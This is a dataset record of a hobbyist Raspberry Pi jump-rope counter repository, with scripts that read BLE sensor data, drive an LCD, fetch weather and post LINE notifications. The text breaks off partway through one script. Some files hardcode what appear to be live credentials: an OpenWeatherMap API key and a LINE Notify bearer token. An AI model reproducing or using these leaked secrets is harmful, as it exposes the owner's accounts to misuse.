repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ktrips/jump | https://github.com/ktrips/jump | 5beb489f67179792a0d41a26881949be8d152ee3 | 73290dedc457757944ed6de4fab3a7fadd99e71d | 63b0ffb83a8940484a2f0eec8778636d4f9466b4 | refs/heads/master | 2023-01-07T06:17:48.415988 | 2020-11-09T10:14:42 | 2020-11-09T10:14:42 | 269,327,208 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7176470756530762,
"avg_line_length": 20,
"blob_id": "8d80c589ed539b54eb9d97083021a33e5cb612b3",
"content_id": "0e6ffe9c2404cc0f86d8d22d98b4e3268337e4c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 4,
"path": "/jump.sh",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\necho \"Start Jump!\"\ncd ~/Programs\nsudo python3 /home/pi/Programs/jump.py\n\n"
},
{
"alpha_fraction": 0.5205371379852295,
"alphanum_fraction": 0.5371248126029968,
"avg_line_length": 32.31578826904297,
"blob_id": "822013e27d2773969e4f0fd4779a6ba4e474bc69",
"content_id": "803b0e12f36ef6d87b6b5cf06fa78230b5fef8ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1266,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 38,
"path": "/forecast.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# -*- coding: utf-8 -*-\nimport json\nimport datetime\nimport os\nimport requests\nimport sys\n\nfrom pytz import timezone\n\nAPI_KEY = \"05369ea6b08123aeacb3f72bb7f24ac2\"\nZIP = \"157-0066,JP\"\nAPI_URL = \"http://api.openweathermap.org/data/2.5/forecast?zip={0}&units=metric&lang=ja&APPID={1}\"\n\ndef getWeatherForecast():\n url = API_URL.format(ZIP, API_KEY)\n response = requests.get(url)\n forecastData = json.loads(response.text)\n\n if not ('list' in forecastData):\n print('error')\n return\n \n #print(forecastData)\n for item in forecastData['list']:\n forecastDatetime = timezone(\n 'Asia/Tokyo').localize(datetime.datetime.fromtimestamp(item['dt']))\n weatherDescription = item['weather'][0]['description']\n temperature = item['main']['temp']\n rainfall = 0\n if 'rain' in item and '3h' in item['rain']:\n rainfall = item['rain']['3h']\n break\n\n print('Date:{0} Weather:{1} Temp:{2} C Rain:{3}mm'.format(\n forecastDatetime, weatherDescription, temperature, rainfall))\n\ngetWeatherForecast()\n"
},
{
"alpha_fraction": 0.726190447807312,
"alphanum_fraction": 0.7321428656578064,
"avg_line_length": 17.66666603088379,
"blob_id": "db7ac9eeb99208d6623a3aaa0935243759a5f297",
"content_id": "039c071d82fd9b03d735a4793e9ae75958aef411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 168,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/README.md",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "# jump\n## Jump scripts for Raspberry Pi\n### How to use:\n\n\n\n## Prerequisits\n### For Google Spreadsheet:\nsudo pip install --upgrade google-api-python-client oauth2client\n"
},
{
"alpha_fraction": 0.4257051348686218,
"alphanum_fraction": 0.4574004113674164,
"avg_line_length": 43.08333206176758,
"blob_id": "7a2bf1645474333bd212a07fc7912ab2e8a1aea3",
"content_id": "6a0294b9e31161506d871776461fa4d2c47dd234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6980,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 156,
"path": "/jump_lcd.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\ninterval = 1 # 動作間隔\n\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\nfrom datetime import datetime\n\nimport dothat.lcd as lcd\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nnow= datetime.now()\n#d = '{0:0>4d}/{1:0>2d}/{2:0>2d}({3})'.format(now.year, now.month, now.day, now.strftime('%a'))\nd = '{0:0>4d}/{1:0>2d}/{2:0>2d}'.format(now.year, now.month, now.day)\n#t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute) #, now.second)\nt = '{0:0>2d}:{1:0>2d}'.format(now.hour, now.minute) #, now.second)\n\nimport requests\n\ndef line_message(text):\n url = \"https://notify-api.line.me/api/notify\"\n token = \"Zaj0BRu04W1aofVIm2AIxGdhuwI5fUayF9ji8sCBpru\"\n headers= {\"Authorization\":\"Bearer \"+token,\n \"Content-Type\":\"application/x-www-form-urlencoded\"}\n #message = 'message送信!'\n payload = {\"message\":text, \n \"stickerPackageId\":2, \n \"stickerId\":513}\n r = requests.post(url ,headers = headers ,params=payload)\n\ncount =0\nstart_seq=0\ncur_cnt =0\nwhile True:\n # BLE受信処理\n try:\n devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n #print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n #print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:18] == 'ROHMMedal2_0040_01': #Short Local Name = ROHMMedal2_0040_01.00\n isRohmMedal = True\n print(val)\n if isRohmMedal and desc == 'Manufacturer':\n\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n sensors['SEQ'] = payval(8)\n SEQ = sensors['SEQ']\n if SEQ == 1:\n start_seq+= 1\n zero_time = datetime.now()\n sensors['Condition Flags'] = bin(int(val[16:18],16))\n sensors['Accelerometer X'] = payval(10,2,True) / 4096\n sensors['Accelerometer Y'] = payval(12,2,True) / 4096\n sensors['Accelerometer Z'] = payval(14,2,True) / 4096\n sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\\\n + sensors['Accelerometer Y'] ** 2\\\n + sensors['Accelerometer Z'] ** 2) ** 0.5\n sensors['Geomagnetic X'] = payval(16,2,True) / 10\n sensors['Geomagnetic Y'] = payval(18,2,True) / 10\n sensors['Geomagnetic Z'] = payval(20,2,True) / 10\n sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\\\n + sensors['Geomagnetic Y'] ** 2\\\n + sensors['Geomagnetic Z'] ** 2) ** 0.5\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n sensors['Magnetic'] = hex(payval(27))\n magnetic = sensors['Magnetic']\n \"\"\"if magnetic != '0x3':\n count+=1\n print(count)\"\"\"\n\n sensors['Steps'] = payval(28,2)\n step_cnt = sensors['Steps']\n if start_seq > 0:\n if start_seq == 1:\n start_time = zero_time\n cur_time= datetime.now()\n dur_time= cur_time - start_time\n cur_cnt = step_cnt\n cur_cal = round(cur_cnt/4)\n if cur_cnt != 0 and cur_cnt%100 == 0:\n text = str(cur_cnt)+\" jump completed!\"\n print(text)\n line_message(text)\n #t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, now.second)\n time_text= cur_time.strftime('%H:%M:%S')\n dur_text = \"Time {} {}\".format(dur_time.seconds, dur_time)\n jump_text= \"Jump \"+str(cur_cnt)+\" Cal \"+str(cur_cal) #+\" JPM \"+str(round(cur_cnt/dur_time.seconds))\n print(time_text)\n print(dur_text)\n print(jump_text) #'Count:',cur_cnt,', Duration:',duration,'-',round(duration.seconds))\n lcd.clear()\n lcd.set_cursor_position(0,0)\n lcd.write(time_text)\n lcd.set_cursor_position(0,1)\n lcd.write(dur_text)\n lcd.set_cursor_position(0,2)\n lcd.write(jump_text)\n\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n #print(' ID =',sensors['ID'])\n print(' SEQ =',sensors['SEQ'])\n \"\"\"print(' Temperature =',round(sensors['Temperature'],2),'℃')\n print(' Humidity =',round(sensors['Humidity'],2),'%')\n print(' Pressure =',round(sensors['Pressure'],3),'hPa')\n print(' Illuminance =',round(sensors['Illuminance'],1),'lx')\n print(' Accelerometer =',round(sensors['Accelerometer'],3),'g (',\\\n round(sensors['Accelerometer X'],3),\\\n round(sensors['Accelerometer Y'],3),\\\n round(sensors['Accelerometer Z'],3),'g)')\n print(' Geomagnetic =',round(sensors['Geomagnetic'],1),'uT (',\\\n round(sensors['Geomagnetic X'],1),\\\n round(sensors['Geomagnetic Y'],1),\\\n round(sensors['Geomagnetic Z'],1),'uT)')\"\"\"\n #print(' Magnetic =',sensors['Magnetic'])\n print(' Steps =',sensors['Steps'],'Cnt')\n\n #print(' Battery Level =',sensors['Battery Level'],'%')\n #print(' RSSI =',sensors['RSSI'],'dB')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n\n"
},
{
"alpha_fraction": 0.49009352922439575,
"alphanum_fraction": 0.5211602449417114,
"avg_line_length": 35.25862121582031,
"blob_id": "0aca4b94c209046101b9b5faff417accc8adf510",
"content_id": "034d70a35082b9dde95990b0a59928f9cbe88485",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6413,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 174,
"path": "/ble_lcd_voice.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\nimport dothat\nimport dothat.backlight as backlight\nimport dothat.lcd as lcd\n\ninterval = 10 # 動作間隔\n\nfrom datetime import datetime\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\n\nimport os\nimport RPi.GPIO as GPIO\nhuman_pin = 13\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(human_pin, GPIO.IN)\nhuman_count = 0\nhuman_check = 3\n\nimport json\nimport requests\nimport sys\n\nfrom pytz import timezone\n\nAPI_KEY = \"xxx\" #WeatherMap API Key\nZIP = \"123-4567,JP\" #Your address\nAPI_URL = \"http://api.openweathermap.org/data/2.5/forecast?zip={0}&units=metric&lang=ja&APPID={1}\"\naquest_path = \"/home/pi/Programs/aquestalkpi/\" #AquesTalkPi path\n\ndef getWeatherForecast():\n url = API_URL.format(ZIP, API_KEY)\n response = requests.get(url)\n forecastData = json.loads(response.text)\n if not ('list' in forecastData):\n print('error')\n return \n #print(forecastData)\n for item in forecastData['list']:\n forecastDatetime = timezone('Asia/Tokyo').localize(datetime.fromtimestamp(item['dt']))\n weatherDescription = item['weather'][0]['description']\n temperature = item['main']['temp']\n rainfall = 0\n if 'rain' in item and '3h' in item['rain']:\n rainfall = item['rain']['3h']\n break\n\n print('Date:{0} Weather:{1} Temp:{2} C Rain:{3}mm'.format(forecastDatetime, weatherDescription, temperature, rainfall))\n return forecastDatetime, weatherDescription, temperature, rainfall\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nwhile True:\n now = datetime.now()\n d = '{0:0>4d}/{1:0>2d}/{2:0>2d}({3})'.format(now.year, now.month, now.day, now.strftime('%a'))\n t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, now.second)\n forecastDatetime, weatherDescription, temperature, rainfall = getWeatherForecast()\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('{}'.format(d))\n lcd.set_cursor_position(2, 1)\n lcd.write('{}'.format(t))\n lcd.set_cursor_position(0, 2)\n lcd.write('W:{1}C {2}mm'.format(round(temperature,0), rainfall))\n if rainfall > 0:\n print(weatherDescription, rainfall)\n os.system(aquest_path+'AquesTalkPi '+weatherDescription+' | aplay')\n \n human = GPIO.input(human_pin)\n if human == 1:\n human_count+=1\n else:\n human_count=0\n print('HCount:'+str(human_count))\n\n try:\n devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:10] == 'ROHMMedal2':\n isRohmMedal = True\n if isRohmMedal and desc == 'Manufacturer':\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n print(' ID =',sensors['ID'])\n print(' Temperature =',round(sensors['Temperature'],2),'℃')\n print(' Humidity =',round(sensors['Humidity'],2),'%')\n print(' Pressure =',round(sensors['Pressure'],3),'hPa')\n print(' Illuminance =',round(sensors['Illuminance'],1),'lx')\n print(' Battery Level =',sensors['Battery Level'],'%')\n print(' RSSI =',sensors['RSSI'],'dB')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n\n temp = sensors['Temperature']\n humid = sensors['Humidity']\n lcd.clear()\n dothat.backlight.set_graph(0.5) # 50%\n backlight.rgb(0, 0, 0)\n if temp > 28 or humid > 80:\n temp_msg = \"Hot!\"\n backlight.rgb(255, 0, 0) #Red\n else:\n temp_msg = \"Not bad\"\n \n illum = sensors['Illuminance']\n if illum < 200:\n illum_msg = \"Dark!\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 1\")\n backlight.rgb(255, 255, 255)\n else:\n illum_msg = \"Bright\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 0\")\n backlight.rgb(0, 0, 255) #Blue\n\n human_msg = str(human_count)\n dothat.backlight.off()\n for led in range(human_count):\n backlight.graph_set_led_state(led, 0.2)\n if human_count > human_check:\n human_msg += ' Take Rest!'\n backlight.rgb(0, 255, 0) #Green\n os.system(aquest_path+'AquesTalkPi \"休憩しましょう!\" | aplay')\n else:\n human_msg += ' Work Hard!'\n backlight.rgb(0, 255, 255) #Lightblue\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('T:{0:1.0f}C {1:1.0f}% {2}'.format(temp,humid,temp_msg))\n lcd.set_cursor_position(0, 1)\n lcd.write('I:{0:1.0f} Lx {1}'.format(illum,illum_msg))\n lcd.set_cursor_position(0, 2)\n lcd.write('H:{}'.format(human_msg))\n \n sleep(interval)\n"
},
{
"alpha_fraction": 0.7025423645973206,
"alphanum_fraction": 0.7296609878540039,
"avg_line_length": 41.10714340209961,
"blob_id": "9722ef5893ef325a17b45ee02601527e4c50e9a5",
"content_id": "95bd95967739e8077e0c37b0bfa82805a7deac89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 28,
"path": "/spreadsheet.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "import httplib2\nimport numpy as np\n\nfrom apiclient import discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\nAPPEND_RANGE = 'Sheet1!A1:G1'\n\nclass SpreadSheet(object):\n def __init__(self, sheet_id):\n self.sheetId = sheet_id\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name('raspberryai-62aca965a8af.json', scopes=SCOPES)\n http_auth = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?''version=v4')\n self.service = discovery.build('sheets', 'v4', http=http_auth, discoveryServiceUrl=discoveryUrl)\n\n def append(self, values):\n assert np.array(values).shape==(7,) , \"The shape of value %s must be 7\" % (np.array(values).shape)\n\n value_range_body = {'values':[values]}\n result = self.service.spreadsheets().values().append(spreadsheetId=self.sheetId, range=APPEND_RANGE, valueInputOption='USER_ENTERED', body=value_range_body).execute()\n #print(result)\n\nif __name__ == '__main__':\n sheet = SpreadSheet(\"1a_PQovhySYPV5D-rGhs1Soh7pvhGWmVltSPsSX_VmuA\")\n sheet.append([\"Date\", \"Time\", 999, 12345, 1999])\n\n"
},
{
"alpha_fraction": 0.4277404248714447,
"alphanum_fraction": 0.4671664834022522,
"avg_line_length": 38.66666793823242,
"blob_id": "b8f1854902ccd5db941077c2d5fff4ffa6c6b343",
"content_id": "42d7e9d854cf8dbf6a053e6edbb10789e2773bdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7826,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 195,
"path": "/ble_disp.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import (division, absolute_import, print_function,\n unicode_literals)\n\nimport fcntl\nimport socket\nimport struct\n\nimport dothat\nimport dothat.backlight as backlight\nimport dothat.lcd as lcd\n\ndef get_addr(ifname):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(\n fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15].encode('utf-8')))[20:24])\n except IOError:\n return 'Not Found!'\n\n\neth0 = get_addr('eth0')\nhost = socket.gethostname()\n\ninterval = 10 # 動作間隔\n\nfrom datetime import datetime\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\n\nimport os\n\nimport RPi.GPIO as GPIO\nhuman_pin = 13\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(human_pin, GPIO.IN)\nhuman_count = 0\nhuman_check = 3\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nwhile True:\n now = datetime.now()\n d = '{0:0>4d}/{1:0>2d}/{2:0>2d}({3})'.format(now.year, now.month, now.day, now.strftime('%a'))\n t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, now.second)\n wlan0 = get_addr('wlan0')\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('{}'.format(wlan0))\n lcd.set_cursor_position(0, 1)\n lcd.write('{}'.format(d))\n lcd.set_cursor_position(2, 2)\n lcd.write('{}'.format(t))\n\n human = GPIO.input(human_pin)\n if human == 1:\n human_count+=1\n else:\n human_count=0\n print('HCount:'+str(human_count))\n\n try:\n devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:18] == 'ROHMMedal2_0107_01': #val[0:10] == 'ROHMMedal2':\n isRohmMedal = True\n if isRohmMedal and desc == 'Manufacturer':\n\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n \"\"\"sensors['SEQ'] = payval(8)\n sensors['Condition Flags'] = bin(int(val[16:18],16))\n sensors['Accelerometer X'] = payval(10,2,True) / 4096\n sensors['Accelerometer Y'] = payval(12,2,True) / 4096\n sensors['Accelerometer Z'] = payval(14,2,True) / 4096\n sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\\\n + sensors['Accelerometer Y'] ** 2\\\n + sensors['Accelerometer Z'] ** 2) ** 0.5\n sensors['Geomagnetic X'] = payval(16,2,True) / 10\n sensors['Geomagnetic Y'] = payval(18,2,True) / 10\n sensors['Geomagnetic Z'] = payval(20,2,True) / 10\n sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\\\n + sensors['Geomagnetic Y'] ** 2\\\n + sensors['Geomagnetic Z'] ** 2) ** 0.5\"\"\"\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n \"\"\"sensors['Magnetic'] = hex(payval(27))\n sensors['Steps'] = payval(28,2)\"\"\"\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n print(' ID =',sensors['ID'])\n #print(' SEQ =',sensors['SEQ'])\n print(' Temperature =',round(sensors['Temperature'],2),'℃')\n print(' Humidity =',round(sensors['Humidity'],2),'%')\n print(' Pressure =',round(sensors['Pressure'],3),'hPa')\n print(' Illuminance =',round(sensors['Illuminance'],1),'lx')\n \"\"\"print(' Accelerometer =',round(sensors['Accelerometer'],3),'g (',\\\n round(sensors['Accelerometer X'],3),\\\n round(sensors['Accelerometer Y'],3),\\\n round(sensors['Accelerometer Z'],3),'g)')\n print(' Geomagnetic =',round(sensors['Geomagnetic'],1),'uT (',\\\n round(sensors['Geomagnetic X'],1),\\\n round(sensors['Geomagnetic Y'],1),\\\n round(sensors['Geomagnetic Z'],1),'uT)')\n print(' Magnetic =',sensors['Magnetic'])\n print(' Steps =',sensors['Steps'],'歩')\"\"\"\n print(' Battery Level =',sensors['Battery Level'],'%')\n print(' RSSI =',sensors['RSSI'],'dB')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n\n temp = sensors['Temperature']\n humid = sensors['Humidity']\n lcd.clear()\n dothat.backlight.set_graph(0.5) # 50%\n backlight.rgb(0, 0, 0)\n if temp > 28 or humid > 80:\n temp_msg = \"Hot!\"\n #dothat.backlight.single_rgb(1, 255, 0, 0)\n backlight.rgb(255, 0, 0)\n else:\n temp_msg = \"Comfort\"\n illum = sensors['Illuminance']\n if illum < 300:\n illum_msg = \"Dark!\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 1\")\n #dothat.backlight.single_rgb(2, 255, 255, 255)\n backlight.rgb(255, 255, 255)\n else:\n illum_msg = \"Bright\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 0\")\n #dothat.backlight.single_rgb(2, 0, 0, 255)\n backlight.rgb(0, 0, 255)\n\n human_msg = str(human_count)\n dothat.backlight.off()\n for led in range(human_count):\n backlight.graph_set_led_state(led, 0.2)\n if human_count > human_check:\n human_msg += ' Take Rest!'\n lcd.clear()\n #dothat.backlight.single_rgb(3, 0, 255, 0)\n backlight.rgb(0, 255, 0)\n else:\n human_msg += ' Work Hard!'\n lcd.clear()\n #dothat.backlight.single_rgb(3, 0, 255, 255)\n backlight.rgb(0, 255, 255)\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('T:{0:1.0f}C {1:1.0f}% {2}'.format(temp,humid,temp_msg))\n lcd.set_cursor_position(0, 1)\n lcd.write('I:{0:1.0f} Lx {1}'.format(illum,illum_msg))\n lcd.set_cursor_position(0, 2)\n lcd.write('H:{}'.format(human_msg))\n sleep(interval)\n\n"
},
{
"alpha_fraction": 0.4566326439380646,
"alphanum_fraction": 0.4901738464832306,
"avg_line_length": 37.765567779541016,
"blob_id": "24b0baa7fdf94d35d5cf32b215f66544c493f65e",
"content_id": "b2fcb1670b84aa98b6dc150deaa8c0cbd5c5e5a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11242,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 273,
"path": "/jump.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\nfrom tkinter import *\nfrom datetime import datetime\n\n# メインウィンドウ作成\nroot = Tk()\n\n# メインウィンドウサイズ\nroot.geometry(\"1024x600\") #720x480\")\n\n# メインウィンドウタイトル\nroot.title(\"Jump\")\n\n# Canvas 作成\nc = Canvas(root, bg=\"#FFFFFF\", width=1024, height=600) #720, height=480)\nc.pack(expand=True, fill=BOTH)\n\n# 文字列作成\nch = c.create_text(520, 30, font=('', 30, ''), fill='black')\nc1 = c.create_text(500, 80, font=('', 30, ''), fill='black')\nc2 = c.create_text(500, 150, font=('', 55, 'bold'), fill='red')\nc3 = c.create_text(500, 250, font=('', 45, ''), fill='blue')\nc4 = c.create_text(500, 350, font=('', 30, ''), fill='green')\nc5 = c.create_text(500, 420, font=('', 30, ''), fill='green')\n\n# 画面がリサイズされたとき\ndef change_size(event):\n # 画面の中心座標を取得\n w = c.winfo_width() / 2\n h = c.winfo_height() / 2\n\n # 文字列の矩形の中心座標を取得\n cd_coords = c.bbox(cd)\n cd_w = cd_coords[0] + (cd_coords[2] - cd_coords[0]) / 2\n cd_h = cd_coords[1] + (cd_coords[3] - cd_coords[1]) / 2\n ct_coords = c.bbox(ct)\n ct_w = ct_coords[0] + (ct_coords[2] - ct_coords[0]) / 2\n ct_h = ct_coords[1] + (ct_coords[3] - ct_coords[1]) / 2\n\n # 中心座標を合わせるように移動\n c.move(cd, w - cd_w, h - cd_h - 60)\n c.move(ct, w - ct_w, h - ct_h + 60)\n\ninterval = 1 # 動作間隔\n\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\nfrom datetime import datetime\njson_dir = \"/home/pi/Programs/\"\nimport json\njson_open = open(json_dir+'tokai53.json', 'r')\njson_load = json.load(json_open)\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nnow= datetime.now()\nd = '{0:0>4d}/{1:0>2d}/{2:0>2d}'.format(now.year, now.month, now.day)\nt = '{0:0>2d}:{1:0>2d}'.format(now.hour, now.minute) #, now.second)\n\nimport requests\n\ndef line_message(text):\n url = \"https://notify-api.line.me/api/notify\"\n token = \"aaaa\"\n headers= {\"Authorization\":\"Bearer \"+token,\n \"Content-Type\":\"application/x-www-form-urlencoded\"}\n #message = 'message送信!'\n payload = {\"message\":text,\n \"stickerPackageId\":2,\n \"stickerId\":513}\n r = requests.post(url ,headers = headers ,params=payload)\n\n\nfrom spreadsheet import SpreadSheet\nspreadsheet_name = 'xxx'\nkey_name = json_dir+'yyy.json'\nsheet_name= 'zzz' #Sheet1' # シート名\n\nsheet = SpreadSheet(spreadsheet_name)\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\ndef get_spreadsheet(searchKey):\n scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(key_name, scope)\n gc = gspread.authorize(credentials) # JSONキーファイルで認証\n wks = gc.open(sheet_name).sheet1 # sheetをオープン\n records = wks.get_all_values() # 中身を取り出して配列に保存\n for i in range(1, len(records)): # sheetの行数分だけ繰り返す\n if records[i][0] == searchKey: # 1列目がTerminalIDと一致するま>で\n gdate=records[i][0]\n gtime=records[i][1]\n gjump=records[i][2]\n gdur =records[i][3]\n gcal =records[i][4]\n gdist=records[i][5]\n print(gdate, gtime, gjump, gdur, gcal, gdist)\n return gdate, gtime, gjump, gdur, gcal, gdist\n\n# 画面のリサイズをバインドする\nroot.bind('<Configure>', change_size)\n\n# メインウィンドウの最大化\nroot.attributes(\"-zoomed\", \"1\")\n\n# 常に最前面に表示\nroot.attributes(\"-topmost\", True)\n\nstart_seq = 0\nstart_text= 'ボタンを押して、ジャンプスタート!'\nstart_time= datetime.now()\nlast_cnt = 0\nlast_time = datetime.now()\nlast_dur = 0\nlast_cal = 0\nlast_mv = 0\n\nwhile True:\n\n c.itemconfigure(ch, text=start_text)\n\n # BLE受信処理\n try:\n 